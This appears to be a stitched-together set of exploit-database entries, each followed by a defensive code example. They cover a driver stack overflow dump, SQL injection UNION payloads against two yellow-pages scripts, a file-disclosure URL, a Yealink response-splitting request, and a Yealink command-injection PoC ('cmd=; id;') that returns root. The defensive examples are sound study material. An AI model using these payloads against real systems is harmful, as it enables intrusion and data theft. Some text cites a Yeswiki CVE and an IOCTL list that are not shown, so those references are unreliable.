41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0  0x41414141`41414141
41414141`41414141  41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000  0x41414141`41414141
41414141`41414141  00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80  0x41414141`41414141
00000000`0020027f  00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000  0x41414141`41414141
00000000`5c4eafe0  00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000  0x20027f
00000000`00000000  0000ffff`00001f80 00000000`00000000 00000000`00000000 00000000`00000000  MSVCR90!pow+0x4e0
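The bugcheck above (DRIVER_OVERRAN_STACK_BUFFER, with the /GS cookie in Arg1 replaced by the 0x41 fill) tells you the handler copied the caller's buffer into a local without checking its length. The first triage step for any IOCTL-reachable bug is to decode the control codes themselves, because the two low bit fields decide how the kernel hands the input buffer to the driver and which access rights the handle needs. The following is an added example, not code from Quadron Research Lab or the vendor: it splits the codes from the report's `ioctl_list` into their CTL_CODE fields (DeviceType bits 16-31, Access bits 14-15, Function bits 2-13, Method bits 0-1) and summarizes what a reviewer wants to know. The field names and constants are the documented Windows ones; the `triage` summary keys are assumptions.

```python
from typing import Dict, Iterable, List

METHOD_NAMES = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
                2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS_NAMES = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
                2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
FILE_DEVICE_UNKNOWN = 0x22  # device type used by most third-party drivers

# The control codes from the report's ioctl_list (duplicate 0x22245c dropped).
POC_IOCTLS: List[int] = [0x22245C, 0x222440, 0x222441, 0x222400, 0x222404,
                         0x222408, 0x222420, 0x222424, 0x222448, 0x222450, 0x222460]


def decode_ioctl(code: int) -> Dict[str, object]:
    """Split a control code into its CTL_CODE fields.
    CTL_CODE(DeviceType, Function, Method, Access) =
        (DeviceType << 16) | (Access << 14) | (Function << 2) | Method"""
    method = code & 0x3
    access = (code >> 14) & 0x3
    return {
        "code": code,
        "device_type": code >> 16,
        "access": access,
        "function": (code >> 2) & 0xFFF,
        "method": method,
        "method_name": METHOD_NAMES[method],
        "access_name": ACCESS_NAMES[access],
    }


def triage(codes: Iterable[int]) -> Dict[str, object]:
    """Summarize the review-relevant facts:
    - any_access: codes whose Access field is FILE_ANY_ACCESS, i.e. any caller
      that can open the device object at all can issue them, so the device's
      security descriptor is the only gate;
    - buffered: METHOD_BUFFERED codes, where the I/O manager copies the caller's
      input into SystemBuffer and the handler must bound its own copy by
      Parameters.DeviceIoControl.InputBufferLength before touching a local buffer."""
    rows = [decode_ioctl(c) for c in codes]
    return {
        "any_access": sorted({r["code"] for r in rows if r["access"] == 0}),
        "buffered": sorted({r["code"] for r in rows if r["method"] == 0}),
        "custom_device": all(r["device_type"] == FILE_DEVICE_UNKNOWN for r in rows),
    }


if __name__ == "__main__":
    for c in POC_IOCTLS:
        d = decode_ioctl(c)
        print(f"0x{c:06X}: device=0x{d['device_type']:02X} function=0x{d['function']:03X} "
              f"{d['method_name']} {d['access_name']}")
    print(triage(POC_IOCTLS))
```

For this driver every listed code is METHOD_BUFFERED with FILE_ANY_ACCESS except 0x222441 (METHOD_IN_DIRECT), which matches the PoC: an unprivileged process opens the device and sends 2000 bytes through the buffered path. The fix on the driver side is the length check in the dispatch routine; the compensating control on the system side is restricting who can open the device object.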
            
# # # # # 
# Exploit Title: Yellow Pages Script v3.2 - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.phpjabbers.com/
# Software: https://www.phpjabbers.com/yellow-pages-script/
# Demo: http://demo.phpjabbers.com/index.php?demo=yps&front=1&lid=1
# Version: 3.2
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionIndex&category_id=[SQL]
# Etc..
# # # # #
            
# # # # # 
# Exploit Title: Yellow Pages Clone Script v1.3.4 - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/yellow-pages-clone-script/
# Demo: http://dexteritysolution.com/demo/directory/
# Version: 1.3.4
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/testmonial.php?blogid=[SQL]
# -2'+/*!50000union*/+select+1,@@version,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6-- -
# http://localhost/[PATH]/blog.php?blogid=[SQL]
# -2'+/*!50000union*/+select+1,@@version,3,4,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,6,7,8,9,10,11,12-- -
# Etc...
# # # # #
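The Yeswiki BaZar export (CVE-2018-13045) and the two phpjabbers/phpscriptsmall entries above are all the same defect: an `id` request parameter is concatenated into the SQL text, so `-1 UNION SELECT ...` is parsed as part of the query. The following is an added example, not code from any of those projects, showing the vulnerable lookup beside its parameterized form against a constructed in-memory SQLite table, with the Yeswiki PoC payload reduced to this table's column count. The table, rows and function names are assumptions for illustration; `sqlite_version()` stands in for `version()`.

```python
import sqlite3
from typing import Dict, List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for a listing table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE listings (id INTEGER PRIMARY KEY, title TEXT, category TEXT)")
    conn.executemany(
        "INSERT INTO listings VALUES (?, ?, ?)",
        [(1, "Plumber", "services"), (2, "Bakery", "food")],
    )
    return conn


def export_vulnerable(conn: sqlite3.Connection, user_id: str) -> List[Tuple]:
    """Vulnerable form: the request parameter is pasted into the SQL text, so a
    value of '-1 UNION SELECT ...' becomes a second SELECT under the attacker's
    control."""
    sql = f"SELECT id, title, category FROM listings WHERE id = {user_id}"
    return conn.execute(sql).fetchall()


def export_parameterized(conn: sqlite3.Connection, user_id: str) -> List[Tuple]:
    """Hardened form: the value is bound as data. The database compares the
    whole string against the id column and never parses it as SQL."""
    return conn.execute(
        "SELECT id, title, category FROM listings WHERE id = ?", (user_id,)
    ).fetchall()


# The Yeswiki PoC payload, reduced from 15 columns to this table's 3.
PAYLOAD = "-1 UNION SELECT 1, sqlite_version(), 3"


def demo() -> Dict[str, List[Tuple]]:
    """Run both forms with the payload and with a legitimate id."""
    conn = make_db()
    return {
        "vulnerable": export_vulnerable(conn, PAYLOAD),
        "parameterized": export_parameterized(conn, PAYLOAD),
        "legit": export_parameterized(conn, "2"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:14} -> {rows}")
```

The vulnerable call returns a row whose second column is the database version, exactly what the PoC URL extracts; the parameterized call returns nothing for the payload and still finds row 2 for a normal id, because SQLite applies numeric affinity to the bound text before comparing it with the integer column.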
            
source: https://www.securityfocus.com/bid/53674/info

The Yellow Duck Framework is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.

Exploiting this vulnerability could allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.

Yellow Duck Framework Beta1 2.0 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?id=./database/config.php 
            
source: https://www.securityfocus.com/bid/68022/info

Yealink VoIP Phones are prone to an HTTP-response-splitting vulnerability because they fail to properly sanitize user-supplied input.

An attacker may leverage this issue to influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.

Yealink VoIP Phones firmware 28.72.0.2 and hardware 28.2.0.128.0.0.0 are vulnerable; other versions may also be affected. 

GET /servlet?linepage=1&model=%0d%0a[Header]&p=dsskey&q=load 
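The request above works because the phone decodes `%0d%0a` in the `model` parameter and reflects the result into a response header, where the CR/LF pair ends that header and lets the rest of the value start a new one. The following is an added example, not Yealink firmware code, with the two controls a defender wants: the validation a server must apply before reflecting a parameter into a header, and a scan of access-log request lines for the encoded CR/LF that such an attempt leaves behind. The `X-Phone-Model` header and the sample log lines are constructed for illustration; only the `model` parameter name comes from the advisory.

```python
import re
from typing import List, Optional
from urllib.parse import unquote


def header_value_is_safe(value: str) -> bool:
    """A header value may not contain CR, LF or any other control character;
    one CR/LF pair ends the header and turns the remainder into a new one."""
    return not any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value)


def build_response_headers(model_param: str) -> Optional[dict]:
    """Headers for a constructed response that echoes the 'model' parameter in
    an assumed X-Phone-Model header. Returns None when the decoded value would
    split the response instead of being reflected as data."""
    decoded = unquote(model_param)  # the server operates on the decoded value
    if not header_value_is_safe(decoded):
        return None
    return {"Content-Type": "text/html", "X-Phone-Model": decoded}


# Percent-encoded CR or LF anywhere in the request target.
ENCODED_CRLF = re.compile(r"%0[dD]|%0[aA]")
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+)')

# Constructed access-log lines; only the second carries the encoded CRLF from the advisory.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Nov/2021:14:20:01 +0000] "GET /servlet?linepage=1&model=T19P&p=dsskey&q=load HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Nov/2021:14:20:07 +0000] "GET /servlet?linepage=1&model=%0d%0aX-Injected:%201&p=dsskey&q=load HTTP/1.1" 200 512',
]


def scan_access_log(lines: List[str]) -> List[str]:
    """Return the lines whose request target contains an encoded CR or LF,
    which is how a response-splitting attempt shows up server-side."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m and ENCODED_CRLF.search(m.group(1)):
            hits.append(line)
    return hits


if __name__ == "__main__":
    print(build_response_headers("T19P"))
    print(build_response_headers("%0d%0aSet-Cookie:%20a=b"))
    for hit in scan_access_log(SAMPLE_LOG):
        print("suspicious:", hit)
```

Rejecting the whole control-character range rather than only `\r\n` matters because some HTTP stacks treat a bare LF as a line terminator, and a reflected value that reaches a Location or Set-Cookie header is the one that turns splitting into cache poisoning or session fixation.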
            
# Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
# Date: 11-10-2021
# Exploit Author: tahaafarooq
# Vendor Homepage: https://www.yealink.com/
# Version: 53.84.0.15
# Tested on: YeaLink IP Phone SIP-T19P (Hardware VoIP Phone)

Description: 

The Ping/Traceroute Diagnostic tool on the Networking tab passes the 'cmd' parameter to the operating system without sanitizing it, allowing an authenticated user to perform OS command injection.

POC:

POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 49
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=9a83d24461329a130
Connection: close

cmd=; id;&token=1714636915c6acea98

-------------------------------------------------

HTTP/1.1 200 OK
Content-Type: text/html
Connection: close
Date: Wed, 10 Nov 2021 14:20:23 GMT
Server: embed httpd
Content-Length: 82

<html>
<body>
	<div id="_RES_INFO_">
            uid=0(root) gid=0(root)
        </div>
</body>
</html>
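The exchange above shows `cmd=; id;` being executed as root: the diagnostic handler hands the parameter to a shell, and `;` ends the ping command and starts another. The following is an added example, not Yealink firmware code, of how such a handler should be written: the target is accepted only if it is an IP literal or a syntactically valid hostname, and the tool is started with an argument list and no shell, so the value can only ever be one argument to ping or traceroute. The handler and helper names, the tool options and the `cmd`-to-target mapping are assumptions for illustration; only the `cmd` parameter name comes from the PoC.

```python
import ipaddress
import re
import subprocess
from typing import List, Optional

# RFC 1123 hostname: labels of 1-63 alphanumerics or '-', not starting or
# ending with '-', 253 characters overall. Whitespace, ';', '|', '`', '$' and
# '(' all fall outside this grammar, so shell metacharacters never pass.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

# Fixed argv prefixes; the only caller-controlled element is the final target.
TOOLS = {"ping": ["ping", "-c", "4"], "traceroute": ["traceroute", "-m", "15"]}


def validate_target(value: str) -> Optional[str]:
    """Return the target if it is an IPv4/IPv6 literal or a valid hostname,
    otherwise None. The PoC value '; id;' is refused here, before any process
    is started."""
    value = value.strip()
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    return value if HOSTNAME_RE.match(value) else None


def build_command(tool: str, target: str) -> Optional[List[str]]:
    """argv for the diagnostic, or None if the tool or target is rejected."""
    if tool not in TOOLS:
        return None
    host = validate_target(target)
    if host is None:
        return None
    return TOOLS[tool] + [host]


def run_diagnostic(tool: str, target: str) -> str:
    """Execute the diagnostic. shell=False (the default) means argv[0] is
    executed directly and the target is a single argument that /bin/sh never
    sees; the handler only refuses, it never escapes or quotes."""
    argv = build_command(tool, target)
    if argv is None:
        return "rejected: invalid tool or target"
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=60)
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    # Constructed request values; the second is the payload from the PoC body.
    for cmd in ("10.0.0.1", "; id;", "example.com; id", "$(id)"):
        print(f"{cmd!r:20} -> {build_command('ping', cmd)}")
```

The design choice worth noting is that validation is an allow-list of what a hostname can look like, not a deny-list of characters. Stripping `;` alone would still leave `|`, `$()`, backticks and newlines, and quoting for one shell is not quoting for another; not invoking a shell removes the whole class.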